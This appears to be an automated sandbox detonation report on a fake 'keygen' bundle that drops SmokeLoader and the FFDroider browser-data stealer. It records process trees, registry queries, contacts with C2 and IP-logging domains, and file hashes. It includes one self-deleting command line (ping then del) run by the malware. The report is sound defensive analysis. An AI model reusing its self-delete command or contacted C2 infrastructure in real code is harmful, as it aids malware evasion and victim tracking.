PID 2436 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2436 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2436 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243720 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 204.97.77.185.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/4728-0-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/464-7-0x0000000000BF0000-0x0000000000C08000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/4956-23-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240729-en

Max time kernel

122s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2384 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2384 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2384 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243711 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.wpdsfds23x.com udp

Files

memory/2384-0-0x0000000000460000-0x0000000000545000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/2392-13-0x0000000000550000-0x0000000000635000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Network

Country Destination Domain Proto
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 136

Network

N/A

Files

memory/2104-1-0x0000000002C30000-0x0000000002D30000-memory.dmp

memory/2104-2-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2104-3-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2104-5-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2104-4-0x0000000000400000-0x0000000002B4E000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Signatures

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Ffdroider family

ffdroider

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Network

Country Destination Domain Proto
RU 186.2.171.3:80 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/4852-0-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4852-1-0x00000000001C0000-0x00000000001C3000-memory.dmp

memory/4852-3-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4852-6-0x0000000003910000-0x0000000003920000-memory.dmp

memory/4852-12-0x0000000003AB0000-0x0000000003AC0000-memory.dmp

memory/4852-19-0x0000000004560000-0x0000000004568000-memory.dmp

memory/4852-20-0x0000000004580000-0x0000000004588000-memory.dmp

memory/4852-22-0x0000000004640000-0x0000000004648000-memory.dmp

memory/4852-25-0x0000000004600000-0x0000000004608000-memory.dmp

memory/4852-26-0x0000000004780000-0x0000000004788000-memory.dmp

memory/4852-28-0x0000000004BB0000-0x0000000004BB8000-memory.dmp

memory/4852-27-0x0000000004CB0000-0x0000000004CB8000-memory.dmp

memory/4852-29-0x0000000004A10000-0x0000000004A18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 926407224df15a10caf40fc9298ce828
SHA1 6f75fa8e1a65e959d62a464fcfc99f0050533c67
SHA256 702f8cf79dd9e9d67dde01190b0bb162aea279b3b70c74322808bc9c9d217633
SHA512 1e91df25d5d287d80ec04212e95ef2cb061eb7850f60968435326d58f8a129bc24090f868e8b70d99bd1c414aed0158cb7c449a1b30152a99c2f4fd43f97333c

memory/4852-42-0x0000000004580000-0x0000000004588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 52cc34948f5c135e341dd212713f5400
SHA1 cc032360546aad1c535b0998a9709f7851631a46
SHA256 a717251c2a877cb54c7b412a9462148ee8b122d23620351ae6f0328c6c9712c2
SHA512 7469714b7db68c88917e85516e129e0105f837b27d78d2f545761a6dec985e89fbe249f0ffbf685c33110139b85ca96287c27cfc396bc914afa7b4d823e81c62

memory/4852-50-0x0000000004A10000-0x0000000004A18000-memory.dmp

memory/4852-52-0x0000000004B40000-0x0000000004B48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 ad58a866bf97e3aa3d9aa136587a5cc8
SHA1 534aacde8723eb76da963dda84607fe7439ccafa
SHA256 9e38a8344af814859c018dfb77eb724c743d08520962f22f95fbabe479670a70
SHA512 b6799227a196cd483e18adf621d407eb8aa04b39df97ad419624a2b70a5dadaf4c6ef84a2a87c4e7091269a8902ad56ea7f2c2041df1769a7e733303a4b25244

memory/4852-65-0x0000000004580000-0x0000000004588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 cdb328429acbc0efeaebfab4ee3eed2f
SHA1 a023d55c23c80842d268d0fd5de0d6ab251a9c56
SHA256 c10cbb8eace9c8ed2c101eed47be489afc6b02faa3de6e730c9d99b35c916e0a
SHA512 89446a66076db7f761deecbd47edfaeede34d80da07f697d2f745ed59a6054c8e855e58e32df50385e3845a204284db1c9b3a672a255b4e69d6fe39518ff0efa

memory/4852-73-0x0000000004B40000-0x0000000004B48000-memory.dmp

memory/4852-75-0x0000000004A10000-0x0000000004A18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 5914297f621150d0bebf27bd8128c7eb
SHA1 ef38ea187d0c74be194ea4ac28d300cc3b7c6ec9
SHA256 dafcabfc6200521fc7ae8ef2fe202acb0fc3620e9908e3981c4d3e8bc916d4ac
SHA512 662153d29e01443b3c1e1cb00fa9508e668f2a16a11dd3cd2bec7ee3dd865a2d9a3dc1c8b935274df879e633820e587ba3af9783ca8dca6ce74f631187b913e9

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d

MD5 58f54e30eb6deca7ac60c29407f00cfd
SHA1 655b0427f848b3fdcdf73c4196fff2b6cf8d4f8a
SHA256 3fcec09c7824b369b34ad40c88df95bfa60d32db2e617bbcc47708bcdeb29673
SHA512 a5467e3cfd4e4ff754c7df33f10c522b827d875fa0d40bf0e92b031171af782e33725ef96b50b2e43d4610353d1364cd223dad052df866d86540a117e53a3959

memory/4852-114-0x0000000004440000-0x0000000004448000-memory.dmp

memory/4852-115-0x0000000004460000-0x0000000004468000-memory.dmp

memory/4852-123-0x0000000004500000-0x0000000004508000-memory.dmp

memory/4852-127-0x0000000004680000-0x0000000004688000-memory.dmp

memory/4852-126-0x0000000004500000-0x0000000004508000-memory.dmp

memory/4852-128-0x0000000004730000-0x0000000004738000-memory.dmp

memory/4852-129-0x0000000004740000-0x0000000004748000-memory.dmp

memory/4852-130-0x00000000046A0000-0x00000000046A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 c957fc9e6988f42276d56624338620df
SHA1 23eeb2cb741d65972a545cc9ae41af7fa51f1f7a
SHA256 fc515a708906060ebd048033f885b3c64c5a73a2e2cef8af7c5a9974f0fc2ef0
SHA512 b42ab56c07d4599f24845cd3d64f3ebf9b0bbd5ef2dc53c285a4b31d9d5053dda08b513a2a90f6e3db82cd6e2963a35b5831fea325eb43701ec51d844fb760ac

memory/4852-143-0x0000000004460000-0x0000000004468000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 cb8194a410bddba0fafd4ec525a276f0
SHA1 eefb3ffc2193ebf20a93b86f56608d73ec71fd0e
SHA256 b291b9386ac190771b269519d4cc39f62f67c599a8395069207875658108a5fe
SHA512 7a2434eb70d6a9e12a5edac585118274e100929241fd2218afe82cbb22aecbc8beb420fcbd3c66697dc10b1f7a952d796e67f3ec6f08ae56fb873f5e03427b72

memory/4852-151-0x00000000046A0000-0x00000000046A8000-memory.dmp

memory/4852-153-0x00000000046D0000-0x00000000046D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 31a271b58938255b0e09bc9a8a09e4f9
SHA1 26082d035328da9f6cb5eba2f6d23dcfbe435de4
SHA256 084affe38efc8bdab6efd114b25a87bbeec3a2b1228b992229573a2dd916c80d
SHA512 000fe7c00b944950aacb0b96e4352879bfccc92481effc61e84beed9849bf2946b30574fa1003c8a10b997eeaaad6169f8daed7280e05b0bd138ea7bc10c4026

memory/4852-166-0x0000000004460000-0x0000000004468000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 5eb4fbc613422f173ceab6222fb77668
SHA1 5212c3693f01398a9a46b8d87d84f434603e7c37
SHA256 e994e0640bb1d18ade56d54f67fd5bac0ef9d2c90a26391f07a89f1409bed93f
SHA512 e2f7e3123f1ea64c8bf4c0a520617750699647b867bfd812b80731c37f644d74fd0bb27d9b82524622b9598bedcab7ae795c803c2b2676e768ad1cbaa36b33f7

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 247bc2d143127033fd0e239696aa7e4d
SHA1 acd55dc758133c460a3a3a3bdc7382c01ef1ad15
SHA256 6161c72ba76fa6e1bf3df4370c998e87038143eb6b75d778865f352efd35f727
SHA512 24bcef61e62b968736aef10d968539de50e978b05cfe644bc6ac736df00e0fa9d6a1cc8dde631c1c4eb37bf51256bb0c00bee78d8649637ede6f6c7684197773

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 7f47a2f74490393a0e2be1606befa507
SHA1 b3bcb0ecd5253adc200744ac04b733c6e54c3d07
SHA256 f2dc48f6e3ddd6c44f0766df5c78c03a9b5f481aa9bfc59c12888162b2b30384
SHA512 6b2ef7c410c5092b2eb3820cf6ba6e1b8b62e39a7c3c6689d1e9632c810ede6ebe057508473da6cc7fff5c46cd61a7053a9302a2064170864a2845f20d4d991f

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 9c587692d84b0ddcc1517f5b1d9d3fee
SHA1 fea4316a842c0690d22b3427dbc90e1555be2b4f
SHA256 c752b6af13651bb4da039bf2f0c12ad8c940d0d7a0420e9d8db44ad4894cafaa
SHA512 7f54dce72438c12314e1a0aff392591378cef4b7f8a63a7dea073ccf337f901d593c3cabf2af297b6f1c403ec56cb04d90f02ae63f08ab2aac43b1a55c2cc139

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 3deba472e3a69e0743ebf3810e6a4810
SHA1 306971a845445a88acef46f4d395879ceb0c6b7c
SHA256 1d1e698568de105859227fc703439e1c7db758724b8db1441b43669bd617b8bb
SHA512 dd79abcc3b2bc8f47f7c0f6f6206c15faa988e9d37b0a2454dafb040a4be294cbd31cad6c0ce13842e8a38af29397a6749b3def9e3ba4751107df319b8bb5b0b

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 a4f50f88bc64bfa23fd4761fd2a6100c
SHA1 5088b5bccd302613a9723958a25d3a49141679f4
SHA256 3bd289dcf9af37c5900242c7761a7064ed4fb66f22bfd5b5c1f7c14b2941ba89
SHA512 62a7af73e54725a6b8ff74e421824432bb6a3eb1f8688f25691b8360de76758f4d6bb18a7c8a6d66df0f0e9aeb00d4a301d281b6c2fd63e01928f317e985a0d0

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 fa746b739da82d6bd0a0819819d34b35
SHA1 f0a519f9a3ae8f4cfee7ca4ed1ded8d660cbf44a
SHA256 76e626f247194925983d2bb363251aa45baecc3dd8ca1ec1251928e5ad2d4428
SHA512 6cab21ab75bd09c6dc11bb902bedfa2916689acd705f4c56c4c7cd29ccb215e9af2100075b588d341c377ca1f9a51f9691a94a0aef66a265abd888dd4c5abd31

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 63a03ba3064caf924be2c620567765c0
SHA1 7d7f328a47dce9fea412e455f7f638b98a5ec420
SHA256 9ca8dd42e233b7dae30d9b7634f26831a177c7d362e668c4c7404d10b4e93fb8
SHA512 58770ae35e81aaa6c87382c8f5be01a761274d569c6f9b1ccd6a869c3581b8e66f81a9c2be16374a5aa96e5f3ee67c2fb3159b14cb51790ff861b3b6e69756f9

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 1c106a7935fb8d24ea63f3be3a11bf1a
SHA1 59950ea6d6c8efe7dcd50e9406b00727e4d84fb8
SHA256 ffc10336ecc1636cdb7d4f59790f1870e1ebfaf7cc6c5e2430183016d9fde427
SHA512 24e13185997839ff830f54d8558d0b4e418f510e09d494a20bc6a555dc6f8a8f7a4840757defda2520789a1e80a9f402f5fd4efbb002b2bfc9c203ff7a1c1fc0

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 7b6dab3730e624083fd0bdc439804d90
SHA1 91f0b46b2a6457a62bc489a4e250b05296d54798
SHA256 202815f0c793a6b616b6e6c7f839c77efe3a72d7b661362a4619c49a7679dd14
SHA512 84092ea02e60093c19b94b6f6491b9a08816c82490a39ac12891bafdcee581383dd7299dd72e504605297b462ee70f340043dd17e0c4b1ed9c5936835ec67ad4

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 5010c8cf5d1d8c19942158cdaf17dc1a
SHA1 0578ddbcfe262e8d005aa252cfb958e6b9d3d92a
SHA256 35e010a1b8c12ec0b291c8c9ded940ebd31243be2f06972200a543e4a8fb78b5
SHA512 aaf7e29f98134337c4f906470c2668ca2dbdfb9790e09c84c6b5c771fb1477600cdc7a3da601af0b25d2b555669fcd644fe0578b4388b85d8d4f4ee6b19795a6

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 76ad364c071795e8b6fc0b3aff8269e1
SHA1 5b8fb20fa90bb888e391c7de497db1cf191cebcc
SHA256 51fdedfc60c1d3d2e35464730ab62687d4a60a61c50585c27f5d8e924b5a7dda
SHA512 62c70ace52e29e1acb16057b6793224f4323a681068df85c050158158f5ccdbfaeb4ec9949adca72847ab9a5bf4cb1bff105fc827cd2e4d2114c587f0d7ced12

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 3ef9e2341185bec0c8e28edb71cb99f4
SHA1 dfad98e3e8acf9ad118893d3df08bedfcf624ff0
SHA256 be4ad11d94fae014b130ab8920e6aa1721d7d0e14430ae37143c49e7aa432656
SHA512 5cecf5522dc3320fee47f3ec388b4c2b57679ad110388bed3f69e4598167d178e9f0de1ef39a3b414d9370f55144546b569c399d0e31d1e3792dc5638fecea08

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 52284ab79ce0eeb3c90042ab6855e970
SHA1 305bf99234fdd6eddbfe99f0442e4dea448ffbab
SHA256 23bb05ad23d4ffb49251d47033d9f7f2734fe9e7d242fa8e81328598d7c383e2
SHA512 92d79090e2d82d387a0ce08e9298d053b3679d850eb6cf9971c5c657a4c9eb9f8afacf930c48aa58a9f6a2aa04cedffb26c98607e07a42ee2a714a1a5eb46e24

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 57ea81cd632caed424a9e7e35f7fe0a7
SHA1 454a6d74e693adfc5b2d9ff25b555abb57df1043
SHA256 5ace4f7eb57f28349178e12b9b6342ac3113e085ef3ab3f0e4eab391845c0757
SHA512 3d0e7dc07f5e939d82eb25f6f142735ffac0e5234dfaffc594a52bc341e581f4ee4d18a322e814bbe6335a510e091a922d1c59547a3ed3650b3066d07565271d

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 16d8c395a5e54ff35e8950785af93112
SHA1 848ccd1cd1128538ad143ae55cbb6d48e3c91d64
SHA256 26160883b9326df451dd0abc8d6f47470cd6a3e350003b6d89147435728d6ea7
SHA512 0486d1bf14b9e58d6be21bdef09e98abc3d8e084eed4314025a4a59bfbc55fec3e13d94c54fa9c7dd2901c4aee07fa43209828dde64af58f0f07207396259318

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.INTEG.RAW

MD5 3976333bf75bbe7b83207471faf22056
SHA1 31874cdfb8e8a54c9d20357fbdf73b5bc9784c6a
SHA256 c21272bb7a988bfdf4cf3864eb9da35f80c523877c464850d455a67f09745ef9
SHA512 a8e30e506e37ecfb9a905b5efe6f300d980ff40096ee66c51fc4f2317b98bdee7d3c1620a0c85aaa1bff73dfe84ca3eb4917e45234aedb3f42a2c50c729c55b9

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 83a38a48f18c2fdef2bbc144bf4ef6d0
SHA1 6b94568f44a384eadf1daed3e8c1342f2651607b
SHA256 51d9cbbbc92be6caa5ca644ab97ff7e146ac1b5207cb32a82ee8d3c804d2ff73
SHA512 fb23f7e9624f9b42e523b50d6b4e5434faadea0d3f3da55411b56591bad7752efd33b5a02ed7d45a5711b8ea014020cf21a685d327a24bafb71b44ccf1c42989

memory/4852-505-0x0000000000400000-0x0000000000667000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
